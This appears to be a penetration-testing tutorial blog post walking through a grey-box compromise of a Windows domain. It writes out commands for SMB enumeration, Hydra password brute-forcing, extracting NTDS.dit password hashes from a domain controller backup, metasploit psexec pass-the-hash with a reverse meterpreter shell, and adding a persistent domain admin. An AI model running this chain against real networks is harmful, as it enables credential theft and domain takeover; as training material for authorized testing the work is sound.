Grey Box Pentesting Scenario

Grey Box Pentesting Scenario

[Total: 1    Average: 5/5]

Gray-Box Penetration Testing Scenario:

1.     What will you learn?!

In this article you will learn how to fully compromise a domain environment without exploiting any vulnerability.

The following article will lead you in details to:

  • Use nmap scripts for smb service
  • Use Hydra to brute-force an account over smb service
  • extract the ntds.dit  from VDI
  • use metasploit with pass-the-hash technique
  • Post exploitation in the enterprise environment

2.     Identify the live hosts and the main services

The most important thing you must keep in mind in your penetration test is the scope, here in our scenario the scope of the penetration test is 20 IP addresses in the IT Department.

IP range will start from


 Figure 1: Simple network diagram for the scenario

By reviewing the engagement rules it’s easy to identify that they put the IT admins with the servers zone which is a vulnerability in the network design and  it is recommended to make IT admins in  the same zone of the core network servers.  My recommendation is to make IT admins in a separate zone and put a tuned firewall between them based on the functions of the admins.

The other important thing in your penetration test is the methodology. Stick to your methodology and try to avoid skipping steps or jumping to other steps. It is highly recommended to stick to the methodology to finish your project on time

Hopefully, we will start our penetration testing project with a vulnerability.

Username PENTEST was created with normal privilege to be used only for this activity.

One of the most powerful tools in the penetration testing process is nmap. In the following steps we will use nmap with the SMB scripts to collect all the information about this domain. So let’s start by identifying the live hosts and services running on them

#nmap –sP <Target-IPs>


We will put our findings of the live hosts in the file Targets.txt.

Now we will run nmap with more options to identify the services up on these hosts and the version of the services

#nmap -sV -sC -iL Targets.txt


Here we go, from this output we can identify various  information

  • These servers are running  windows server 2008 R2 Enterprise 6.1
  • Domain name is pentest.corp.local
  • Computer names are PCL-DC-01 and PCL-FTP-01
  • There are some interesting services DNS,SMB,LDAP and RPC over HTTP

3.     Starting with enumerating users using smb services

In this scenario we will focus on SMB service by using a few nmap scripts to get more information.

We will use our user PENTEST to get more information. We will start by enumerating the domain users using  the following script:

#nmap –script smb-enum-users.nse –script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt


From the output we can easly identify the users in this domain as follows:

  • Administrator, ftpuser, Guest, krbtgt, nuser, pentest

All these users are working except the guest and krbtgt, so we will save the other usernames in a file UserNames.txt

Enumerating share folders in this domain by using the following script

#nmap –script smb-enum-shares.nse –script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt


So the shared folders on are:


there are also shared folders on

  • ADMIN$, C$, IPC$

What we have found at this point is enough in our secenario to start discovering how to capture the flag and gain full privileges on this domain.

4.     After enumerating users, Fire Brute-force

In this section we will build a custom dictionary password attack based on the information we discovered from this domain.

I have used some guessing words to start the password file Pass.txt then I used john-the-ripper to build my list Passwords.lst

#john –wordlist=Pass.txt –rules –stdout > Passwords.lst


Then, I use hydra to start brute-forcing the accounts I found during the enumeration phase

#hydra -L UserNames.txt -P Passwords.txt -M Targets.txt -t 96


I found another user,  Ftpuser with password  ftpP@ssw0rd that has a successful login into  Try to connect to the server using remote desktop with Ftpuser


Figure 2: use remote desktop connection to connect to FTP server

After successfully logging into we start gathering all the information inside this server. After awhile we found a VHD file PCL-DC-01.VHD.

This file seems to be the backup of the domain controller; this was my first thought when I saw this file.

We will mount this partition to our machine then copy the PCL-DC-01.VHD

# mount -t cifs$ -o username=ftpuser,password=ftpP@ssw0rd /mnt/FTP/


If you use KALI LINUX you will need to install this package before running the mount command

#apt-get install cifs-utils



Figure 3: fond PCL-DC-01.VHD file

5.     Mount the VHD file and get the NTDS, SYSTEM, SAM and Config files

If you want to mount the Virtual Box drive image (VDI) in Ubuntu 12.04/12.10 use vdfuse. This Fuse module uses the Virtual Box access library to open a Virtual Box supported VD image file and mount it as a Fuse file system. The mount point contains a flat directory containing the files EntireDisk, Partition1… PartitionN. These can then be loop mounted to access the underlying file systems.

To install vdfuse on KALI Linux run the following command

# apt-get install virtualbox-fuse


To mount the VDI file use the following instructions:

  • Mount the VDI file into mount point
  • By navigating to the mount point you will find the EntireDisk ,Partition1 and  Partition2
  • Mount partition2 to another point
  • Navigate to that point to find the C: partition

We will make directory NTDS

Now we will copy the NTDS folder from the mounted VDI file PCL-DC-01.VDI which contains the active directory database for the pentest.corp.local domain.

Also, we will need the SAM, SECURITY and SYSTEM files form <mount-point>/windows/system32/config/ folder.

6.     Dump the NTDS database and get the users hashes

First download the libesedb libraries from 8.1

Extract and compile the libesedb libraries using the following commands:

#./configure#make#make install



a.      NTDSXtract

Second, download the NTDSXtract framework from 8.2

This framework was developed in order to provide the community with a solution to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).

The modules are capable of extracting information from NTDS.DIT files obtained from the following Windows versions:

  • Windows Server 2003 (32 & 64 bit)
  • Windows Server 2008 (32 & 64 bit)

The code is written in python and tested on the following platforms:

  • MacOS
  • Linux

The framework is capable of extracting information related to:

  • user objects
  • group objects
  • computer objects
  • deleted objects

b.      NTDSXtract Modules

Currently the following modules are included in the NTDSXtract framework:

  • dsfileinformation.py       (time and date information related to the NTDS.DIT database file)
  • dstimeline.py                    (timeline generation module)
  • dsdeletedobjects.py      (module that can extract information related to deleted objects)
  • dsusers.py                          (extracts information related to user objects)
  • dsgroups.py                       (extracts information related to group objects)
  • dscomputers.py                               (extracts information related to computer objects)

You can find more information here 8.3

c.       esedbexport script

esedbexport is used to export items stored in an Extensible Storage Engine (ESE) Database (EDB) file

After installing the libesedb libraries, extract the database tables from ntds.dit using esedbexport script.

# esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit extracted_ntds.dit


d.      Use NTDSXtract dsusers.py module:

Extract the hashes/user info/password history:

# python dsusers.py /tmp/ntds.dit.export/datatable /tmp/ntds.dit.export/link_table –passwordhashes <SYSTEM file> –passwordhistory <SYSTEM file> –certificates –supplcreds <SYSTEM file> –membership > ntds.dit.output


Note: the link_table id could be link_table.[number] or link_table.[number] depending on the previous output

Filter the hashes from the ntds.dit.output using the following command:

# grep -A 1 “Password hashes:” ntds.dit.output  | grep “^[[:blank:]]”


e.      Use metasploit ntds_hashextract.rb module:

Download the metsploit module to extract the usernames and hashes from datatable.3 directly from here 8.4

#/usr/share/metasploit-framework/tools/./ntds_hashextract.rb /tmp/ntds.dit.export/datatable.3 <SYSTEM file>


Now we are interested in the Administrator account. You have  all the accounts with their hashes. You can try cracking those hashes but it could take much more time than required for this process.

In the following section we will use pass the hash technique to use those hashes without cracking the passwords.

7.     Go to the metasploit use psexec with pass-the-hash technique

Warm up your hands as we get ready to capture the flag. Run metasploit and use the psexec module as follows

msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST exploit(psexec) > set SMBDomain pentest.corp.local

msf exploit(psexec) > set SMBUser Administrator

msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:f40b71a29d7723b7cb7e64a8d184dec4

msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(psexec) > set LHOST

msf exploit(psexec) > exploit


Congratulations, in figure 3 you can see that pass-the-hash technique worked and we have a  reverse meterpreter session on the domain controller server


Figure 4: metsploit psexec module exploited and we got reverse meterpreter session 

8.     Post Exploitation and add new user and make it domain admin

Post exploitation in penetration testing can use a lot of different techniques to gather information about the network environment and could lead to more exploitation in the domain.

One of the most important steps after getting the meterpreter is to get the system privilege and migrate to a stable service.

In this section I will illustrate how to add a new account to the domain administrator to maintain your access to the pentest.corp.local domain

In figure 5 you can see that I added a new user pentestAdmin to the domain. Then, I list all the groups inside this domain controller. Finally, I add pentestAdmin to the domain admins to maintain my access to the domain pentest.corp.local.


Figure 5: post exploitation: add username to the domain users then add the user to the domain admins group 

9.     References

9.1.  http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz

9.2. http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

9.3. http://www.ntdsxtract.com

9.4. https://raw.github.com/pentestgeek/metasploit-framework/master/tools/ntds_hashextract.rb

10.      Summary

All information in this article is from a real penetration testing scenario. Some of the steps in the article are straight forward; maybe you will need more skills to bypass some restrictions like the antivirus, host intrusion prevention system and firewalls.

It is advised that the most important part of penetration testing is the reconnaissance and mapping phase.  The more information you gather during the penetration testing activity means the higher possibility of capturing the flag and compromising the network.

11.      About the author


Basem Helmy| ECSA/LPT

He is an information Security Engineer specialist in offensive security track. He is a specialist in penetration testing for network and web applications in highly secured environments with more than 3 years experience.

LinkedIn: https://www.linkedin.com/in/bhelmy

Twitter: https://twitter.com/b4s3mh3lmy


Leave a Reply

Your email address will not be published. Required fields are marked *